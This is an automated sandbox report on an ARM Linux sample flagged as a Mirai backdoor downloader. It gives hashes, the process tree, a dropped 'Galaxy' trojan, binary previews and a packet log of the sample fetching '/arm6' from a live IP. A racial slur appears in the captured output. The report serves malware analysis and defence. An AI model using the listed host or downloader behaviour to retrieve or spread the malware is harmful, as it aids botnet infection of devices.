Edit tour

Linux Analysis Report
dlr.arm6.elf

Overview

General Information

Sample name:	dlr.arm6.elf
Analysis ID:	1582110
MD5:	3056ecdbddff5f0065914d60d947a0c7
SHA1:	b6af905472fb4f465623249f3d440158c9fccbe4
SHA256:	4bef7822a3bf78bed8ada68d8ee30485f80b3b9d3bfab28c7896ee36b96358f4
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Executes the "rm" command used to delete files or directories

HTTP GET or POST without a user agent

Sample has stripped symbol table

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582110
Start date and time:	2024-12-30 02:17:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	dlr.arm6.elf
Detection:	MAL
Classification:	mal48.linELF@0/1@0/0

Warnings

Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: /tmp/Galaxy

Runtime Messages

Command:	/tmp/dlr.arm6.elf
PID:	5480
Exit Code:	5
Exit Code Info:
Killed:	False
Standard Output:	NIGGY RAY
Standard Error:

Process Tree

system is lnxubuntu20

dash New Fork (PID: 5467, Parent: 3633)

rm (PID: 5467, Parent: 3633, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61

dash New Fork (PID: 5468, Parent: 3633)

rm (PID: 5468, Parent: 3633, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61

dlr.arm6.elf (PID: 5480, Parent: 5400, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm6.elf

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: dlr.arm6.elf

ReversingLabs: Detection: 44%

Source: global traffic

HTTP traffic detected: GET /arm6 HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY

Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknown	TCP traffic detected without corresponding DNS query: 103.188.82.218

Source: global traffic

HTTP traffic detected: GET /arm6 HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY

Source: unknown

Network traffic detected: HTTP traffic on port 46540 -> 443

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal48.linELF@0/1@0/0

Source: /usr/bin/dash (PID: 5467)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61			Jump to behavior
Source: /usr/bin/dash (PID: 5468)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61			Jump to behavior

Source: /tmp/dlr.arm6.elf (PID: 5480)

File written: /tmp/Galaxy

Jump to dropped file

Source: /tmp/dlr.arm6.elf (PID: 5480)

Queries kernel information via 'uname':

Jump to behavior

Source: dlr.arm6.elf, 5480.1.00005639d6c5f000.00005639d6d8d000.rw-.sdmp	Binary or memory string: 9V!/etc/qemu-binfmt/arm
Source: dlr.arm6.elf, 5480.1.00007ffd587e6000.00007ffd58807000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm6.elf
Source: dlr.arm6.elf, 5480.1.00005639d6c5f000.00005639d6d8d000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: dlr.arm6.elf, 5480.1.00007ffd587e6000.00007ffd58807000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 File Deletion	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dlr.arm6.elf	45%	ReversingLabs	Linux.Backdoor.Mirai

Dropped Files

Source	Detection	Scanner	Label	Link
/tmp/Galaxy	61%	ReversingLabs	Linux.Trojan.Mirai

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.188.82.218	unknown	unknown		7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	false
185.125.190.26	unknown	United Kingdom		41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
185.125.190.26	Aqua.arm6.elf	Get hash	malicious	Unknown	Browse
	Aqua.arm4.elf	Get hash	malicious	Unknown	Browse
	Aqua.ppc.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	x86_64.elf	Get hash	malicious	Unknown	Browse
	bot.x86.elf	Get hash	malicious	Mirai, Okiru	Browse
	armv6l.elf	Get hash	malicious	Mirai	Browse
	x86_64.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	bot.arm.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	bot.arm5.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	bin.sh.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	dlr.mips.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	main_arm.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	DemonGen-linux-amd64.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm5.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm6.elf	Get hash	malicious	Mirai, Moobot	Browse	91.189.91.42
	Aqua.mips.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	i.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	109.71.252.43-boatnet.ppc-2024-12-28T20_30_37.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	103.187.127.118
	star.ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	103.187.81.199
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	157.85.109.58
	db0fa4b8db0333367e9bda3ab68b8042.sh4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	103.177.151.232
	db0fa4b8db0333367e9bda3ab68b8042.spc.elf	Get hash	malicious	Mirai, Gafgyt	Browse	103.183.119.78
	4qOTcmSTSq.exe	Get hash	malicious	Unknown	Browse	103.8.70.183
	https://fsharetv.co/	Get hash	malicious	Unknown	Browse	103.67.200.64
	armv5l.elf	Get hash	malicious	Unknown	Browse	103.166.191.136
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	103.176.143.37
	splm68k.elf	Get hash	malicious	Unknown	Browse	130.56.86.105

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/tmp/Galaxy

Download File

Process:	/tmp/dlr.arm6.elf
File Type:	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
Category:	dropped
Size (bytes):	76632
Entropy (8bit):	6.114184146565819
Encrypted:	false
SSDEEP:	1536:annlsrwAIHMG9TKHYuOUaFKyWQWMcDiEQtNoRKjGq7yK5wYLDo:trgP9TK4uOUaF5NoRKjGqmKeok
MD5:	47CAC71CCAF21B19830F7D068EBFF1E1
SHA1:	3AE1402518C4ACCF4BFA935C6B6B4BA7E6C55597
SHA-256:	EAFADF193E977C0701902EC71D64D1146C13B4C47C6728D37ADBCFC8A63B74F4
SHA-512:	DDD532F66AC7BA5B75A36B822D5B9EF92EF0D12C03C45F56F155977253FA65F6E73A1F1C1529782276806BF2AB57C4D5459AB8E8F389E7EA950D2F2404791923
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Reputation:	low
Preview:	.ELF..............(.....T...4...x)......4. ...(......................%...%...............&...&...%..................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../..).......%....-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../......%...)...&.................. ... -...-.......-......0../..*.............G-......p.......... `........p..0...0....P..P...P....U......G..../.......p..@........P.....$....-..................,.........l0........P.....`0...........0....S.. ...............0....S...... ....R..........,........... ...0.........../..... )..$)....P..@-..@.......0....S.................0....R...............^..............@..../.......P.............@.......O-...Q...M..@...P..........O..../.........!<.. 4...,...4....T.......... ....T.. ............Y......1...`...pD...W....:.........'.......0f...........C.. ... ...0P..pG..0....W..0...@... ..0................W..`...P..=....P....U..`..0...

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
Entropy (8bit):	4.838130965914829
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	dlr.arm6.elf
File size:	1'444 bytes
MD5:	3056ecdbddff5f0065914d60d947a0c7
SHA1:	b6af905472fb4f465623249f3d440158c9fccbe4
SHA256:	4bef7822a3bf78bed8ada68d8ee30485f80b3b9d3bfab28c7896ee36b96358f4
SHA512:	a3ec18d2c39ff26a2d646fa9d6e4ec9fc85474dfef64c36d991a6fc77edbf50d07cfa8248588299fa0ea1895f61160ec93a5aa9781ad132a1199b565249a204a
SSDEEP:	24:CCKGpa7Urz/jlfHAXK1hH9Vev3gRGaJ9iMjBBuplxrR+zDS+ZA:vKGpa7UrLZH/I+JdBuplxrsDS+Z
TLSH:	5F312E91A3D05FBCCCE491BEED52431473689F40E0C77263D218B754BD2AEBC9D26046
File Content Preview:	.ELF..............(.........4...........4. ...(.....................<...<...............<...<...<...................Q.td.........................................8...<...4...........(.."...#...../...-.......M.................../...-.......M................

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x838c
Flags:	0x4000002
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	1164
Section Header Size:	40
Number of Section Headers:	7
Header String Table Index:	6

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x80a0	0xa0	0x35c	0x0	0x6	AX	16
.rodata	PROGBITS	0x83fc	0x3fc	0x40	0x1	0x32	AMS	4
.got	PROGBITS	0x1043c	0x43c	0xc	0x4	0x3	WA	4
.bss	NOBITS	0x10448	0x448	0x8	0x0	0x3	WA	4
.ARM.attributes	ARM_ATTRIBUTES	0x0	0x448	0x10	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x458	0x33	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x43c	0x43c	5.2565	0x5	R E	0x8000	.text .rodata
LOAD	0x43c	0x1043c	0x1043c	0xc	0x14	0.0000	0x6	RW	0x8000	.got .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 02:17:52.386693001 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:52.391622066 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:52.391680956 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:52.392383099 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:52.397229910 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360662937 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360759020 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360773087 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360790968 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360802889 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360802889 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.360816002 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360829115 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360847950 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360858917 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360872984 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.360933065 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.360933065 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.360934019 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.360934019 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.360934019 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.360934019 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.360934019 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.360934019 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.367002964 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.367021084 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.367053986 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.367053986 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.367296934 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.367345095 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.620887041 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.620903015 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.620913029 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.620940924 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.620940924 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.621005058 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.630039930 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.630068064 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.630076885 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.630081892 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.630109072 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.630151987 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.648361921 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.648374081 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.648385048 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.648410082 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.648410082 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.648453951 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.666480064 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.666491032 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.666501045 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.666536093 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.666536093 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.666536093 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.684675932 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.684686899 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.684698105 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.684746981 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.684747934 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.684747934 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.702850103 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.702862024 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.702872038 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.702908039 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.703056097 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.721168041 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.721179008 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.721189022 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.722265005 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.739294052 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.739309072 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.739324093 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.740247011 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.757502079 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.757513046 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.757522106 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.757960081 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.775809050 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.775820017 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.775829077 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.776431084 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.881071091 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.881082058 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.881091118 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.881118059 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.890192986 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.890204906 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.890218973 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.891674042 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.908395052 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.908421993 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.908432961 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.908451080 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.910602093 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.926541090 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.926619053 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.926629066 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.927472115 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.944690943 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.944709063 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.944717884 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.944880962 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.962878942 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.962897062 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.962905884 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.963888884 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.981169939 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.981178999 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.981189013 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.981880903 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:53.999330044 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.999341011 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:53.999346018 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.000684977 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:54.017417908 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.017436028 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.017445087 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.017682076 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:54.033905983 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.033924103 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.033931971 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.036484957 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:54.049350977 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.049386978 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.050668001 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:54.056629896 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.056668997 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.056679010 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.057363987 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:54.071172953 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.071291924 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.095370054 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:17:54.095415115 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:54.675180912 CET	45908	80	192.168.2.14	103.188.82.218
Dec 30, 2024 02:17:54.680146933 CET	80	45908	103.188.82.218	192.168.2.14
Dec 30, 2024 02:18:04.910059929 CET	46540	443	192.168.2.14	185.125.190.26
Dec 30, 2024 02:18:36.396878004 CET	46540	443	192.168.2.14	185.125.190.26

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.14	45908	103.188.82.218	80

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 02:17:52.392383099 CET	46	OUT	GET /arm6 HTTP/1.0 Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
